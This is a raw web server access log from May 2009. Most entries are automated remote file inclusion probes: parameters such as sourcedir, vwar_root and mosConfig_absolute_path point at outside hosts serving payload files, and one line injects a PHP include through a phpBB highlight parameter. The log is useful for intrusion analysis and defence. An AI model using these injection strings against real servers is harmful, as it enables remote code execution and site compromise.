218.185.20.88 - - [25/May/2009:03:21:27 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
218.185.20.88 - - [25/May/2009:03:21:27 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:22:04 -0400] "GET /logs/access_log.Q108091400///vwar/backup/errors.php?error=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
212.227.96.166 - - [25/May/2009:03:22:16 -0400] "GET /?sourcedir=http://www.klean-tech.com.tw/UserFiles/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
212.227.96.166 - - [25/May/2009:03:22:16 -0400] "GET /logs/access_log.Q109050900/?sourcedir=http://www.klean-tech.com.tw/UserFiles/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
212.227.96.166 - - [25/May/2009:03:22:16 -0400] "GET /logs/?sourcedir=http://www.klean-tech.com.tw/UserFiles/copyright.txt???? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
212.227.96.166 - - [25/May/2009:03:22:24 -0400] "GET /logs/access_log.Q108052200/?sourcedir=http://www.klean-tech.com.tw/UserFiles/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
212.227.96.166 - - [25/May/2009:03:22:27 -0400] "GET /?sourcedir=http://www.klean-tech.com.tw/UserFiles/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
212.227.96.166 - - [25/May/2009:03:22:27 -0400] "GET /logs/?sourcedir=http://www.klean-tech.com.tw/UserFiles/copyright.txt???? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
212.227.96.166 - - [25/May/2009:03:22:28 -0400] "GET /logs/access_log.Q109050900/?sourcedir=http://www.klean-tech.com.tw/UserFiles/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
212.227.96.166 - - [25/May/2009:03:22:29 -0400] "GET /logs/access_log.Q108052200/?sourcedir=http://www.klean-tech.com.tw/UserFiles/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
94.23.200.54 - - [25/May/2009:03:24:21 -0400] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
94.23.200.54 - - [25/May/2009:03:24:21 -0400] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
94.23.200.54 - - [25/May/2009:03:24:21 -0400] "GET /logs/access_log.Q109050700//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.185.20.88 - - [25/May/2009:03:24:49 -0400] "GET /logs/error_log.Q108012600//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.185.20.88 - - [25/May/2009:03:24:49 -0400] "GET /logs/access_log.Q109050900//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
94.23.200.54 - - [25/May/2009:03:25:08 -0400] "GET /?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
94.23.200.54 - - [25/May/2009:03:25:08 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
94.23.200.54 - - [25/May/2009:03:25:08 -0400] "GET /logs/?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
94.23.200.54 - - [25/May/2009:03:25:20 -0400] "GET /?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
94.23.200.54 - - [25/May/2009:03:25:20 -0400] "GET /logs/access_log.Q108091100%20%20/?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
94.23.200.54 - - [25/May/2009:03:25:20 -0400] "GET /logs/?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
209.59.12.99 - - [25/May/2009:03:25:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
58.227.193.198 - - [25/May/2009:03:25:24 -0400] "GET /?sourcedir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:03:25:24 -0400] "GET /logs/?sourcedir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:03:25:24 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:03:25:27 -0400] "GET /logs/access_log.Q108091100%20%20/?sourcedir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:03:25:27 -0400] "GET /?sourcedir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:03:25:27 -0400] "GET /logs/?sourcedir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
94.23.200.54 - - [25/May/2009:03:25:32 -0400] "GET /logs/access_log.Q108061800/?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
75.126.49.163 - - [25/May/2009:03:25:33 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=hhttp://www.ghetto.uz/readme.txt? HTTP/1.1" 200 453 "-" "libwww-perl/5.811"
207.182.143.50 - - [25/May/2009:03:25:34 -0400] "GET /?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:03:25:34 -0400] "GET /logs/access_log.Q108091100%20%20/?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:03:25:36 -0400] "GET /?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:03:25:36 -0400] "GET /logs/?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:03:25:37 -0400] "GET /logs/?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:03:25:37 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:25:42 -0400] "GET /?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:25:46 -0400] "GET /?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:25:47 -0400] "GET /logs/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:25:47 -0400] "GET /logs/error_log.Q108090500%20%20/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:25:48 -0400] "GET /logs/access_log.Q108062200%20%20/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:25:49 -0400] "GET /logs/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:25:49 -0400] "GET /logs/error_log.Q108090500%20%20/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:25:49 -0400] "GET /logs/access_log.Q108062200%20%20/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
94.23.200.54 - - [25/May/2009:03:25:53 -0400] "GET /logs/access_log.Q108061800%20%20/?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
70.38.31.50 - - [25/May/2009:03:25:53 -0400] "GET /logs/access_log.Q109050900%20//shop/main.php?_shop_path=http://feiwu-au.tw/appserv/AUTHORS.txt%0D?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
200.93.147.154 - - [25/May/2009:03:26:02 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:26:02 -0400] "GET /?sourcedir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:26:03 -0400] "GET /?sourcedir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:26:03 -0400] "GET /logs/?sourcedir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:26:06 -0400] "GET /logs/?sourcedir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:26:06 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:26:11 -0400] "GET /?sourcedir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:26:11 -0400] "GET /logs/?sourcedir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:03:26:13 -0400] "GET /logs/access_log.Q108061800/?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:26:14 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:03:26:19 -0400] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:03:26:19 -0400] "GET /logs/access_log.Q109050700//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:03:26:21 -0400] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:03:26:26 -0400] "GET /logs/access_log.Q108061800%20%20/?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:26:28 -0400] "GET /logs/?sourcedir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:26:29 -0400] "GET /logs/access_log.Q108091100%20%20/?sourcedir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:26:30 -0400] "GET /?sourcedir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:03:26:32 -0400] "GET /logs/access_log.Q109042200%20%20/?sourcedir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:03:26:45 -0400] "GET /?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:03:26:46 -0400] "GET /logs/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:03:26:46 -0400] "GET /logs/error_log.Q108090500%20%20/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:03:26:47 -0400] "GET /logs/access_log.Q108062200%20%20/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:03:26:51 -0400] "GET /?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:03:26:52 -0400] "GET /logs/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:03:26:52 -0400] "GET /logs/error_log.Q108090500%20%20/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
72.30.142.171 - - [25/May/2009:03:26:53 -0400] "GET /logs/error_log.Q108072900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
208.64.202.134 - - [25/May/2009:03:26:54 -0400] "GET /logs/access_log.Q108062200%20%20/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:27:01 -0400] "GET /logs/access_log.Q108091100%20%20/?sourcedir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:27:01 -0400] "GET /?sourcedir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:27:01 -0400] "GET /logs/?sourcedir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
66.249.72.114 - - [25/May/2009:03:27:06 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L208806444A618500374D080+WSEQ(S0060):1+OUITEM(A0200):5098000 HTTP/1.1" 200 27010 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
94.23.200.54 - - [25/May/2009:03:27:17 -0400] "GET /logs/?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
94.23.200.54 - - [25/May/2009:03:27:17 -0400] "GET /?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
94.23.200.54 - - [25/May/2009:03:27:21 -0400] "GET /logs/access_log.Q108052200/?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
85.214.66.22 - - [25/May/2009:03:27:24 -0400] "GET /show_news.php?cutepath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
85.214.66.22 - - [25/May/2009:03:27:24 -0400] "GET /logs/show_news.php?cutepath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
85.214.66.22 - - [25/May/2009:03:27:24 -0400] "GET /logs/access_log.Q109051100/show_news.php?cutepath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:27:26 -0400] "GET /logs/error_log.Q108052600/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:27:26 -0400] "GET /logs/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:27:26 -0400] "GET /?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:27:29 -0400] "GET /?sourcedir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:27:29 -0400] "GET /logs/?sourcedir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:27:31 -0400] "GET /?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:27:31 -0400] "GET /logs/error_log.Q108052600/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:27:31 -0400] "GET /logs/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:27:32 -0400] "GET /logs/access_log.Q108091100%20%20/?sourcedir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:03:27:33 -0400] "GET /?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:03:27:33 -0400] "GET /logs/?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:03:27:33 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:03:27:43 -0400] "GET /logs/?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:03:27:43 -0400] "GET /?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:03:27:43 -0400] "GET /logs/access_log.Q108091100%20%20/?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:03:27:43 -0400] "GET /logs/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:03:27:43 -0400] "GET /logs/error_log.Q108052600/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:03:27:43 -0400] "GET /?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:03:27:44 -0400] "GET /?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:03:27:44 -0400] "GET /?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:03:27:44 -0400] "GET /logs/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:03:27:44 -0400] "GET /logs/error_log.Q108052600/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:03:27:44 -0400] "GET /logs/?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:03:27:54 -0400] "GET /logs/access_log.Q108061800/?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:03:27:57 -0400] "GET /logs/access_log.Q108052200/?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:03:28:09 -0400] "GET /logs/access_log.Q108061800%20%20/?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:03:28:15 -0400] "GET /?sourcedir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:03:28:15 -0400] "GET /logs/error_log.Q108052800%20%20/?sourcedir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:03:28:15 -0400] "GET /logs/?sourcedir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:28:17 -0400] "GET /logs/access_log.Q109042200%20%20/?sourcedir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
72.30.142.171 - - [25/May/2009:03:28:35 -0400] "GET /images/_notes/download_bonetack.jpg.mno HTTP/1.0" 200 260 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.23.158.226 - - [25/May/2009:03:28:36 -0400] "GET /logs/access_log.Q109050900/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:28:37 -0400] "GET /logs/access_log.Q109050900/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
216.246.124.211 - - [25/May/2009:03:28:38 -0400] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
216.246.124.211 - - [25/May/2009:03:28:38 -0400] "GET /logs/access_log.Q109050300%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
216.246.124.211 - - [25/May/2009:03:28:38 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
216.246.124.211 - - [25/May/2009:03:28:42 -0400] "GET /logs/access_log.Q108091400%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:03:28:42 -0400] "GET /logs/error_log.Q108090500%20%20/?sourcedir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:28:56 -0400] "GET /logs/access_log.Q109042200%20%20/?sourcedir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:03:28:59 -0400] "GET /?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:03:28:59 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:03:28:59 -0400] "GET /logs/?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
94.23.200.54 - - [25/May/2009:03:29:08 -0400] "GET /?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
94.23.200.54 - - [25/May/2009:03:29:08 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
94.23.200.54 - - [25/May/2009:03:29:08 -0400] "GET /logs/?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:29:17 -0400] "GET /logs/access_log.Q109042200%20%20/?sourcedir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
94.23.200.54 - - [25/May/2009:03:29:22 -0400] "GET /logs/access_log.Q108061800/?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
91.121.210.42 - - [25/May/2009:03:29:27 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
91.121.210.42 - - [25/May/2009:03:29:27 -0400] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
91.121.210.42 - - [25/May/2009:03:29:27 -0400] "GET /logs/access_log.Q109050300%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:03:29:31 -0400] "GET /logs/access_log.Q108061800/?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
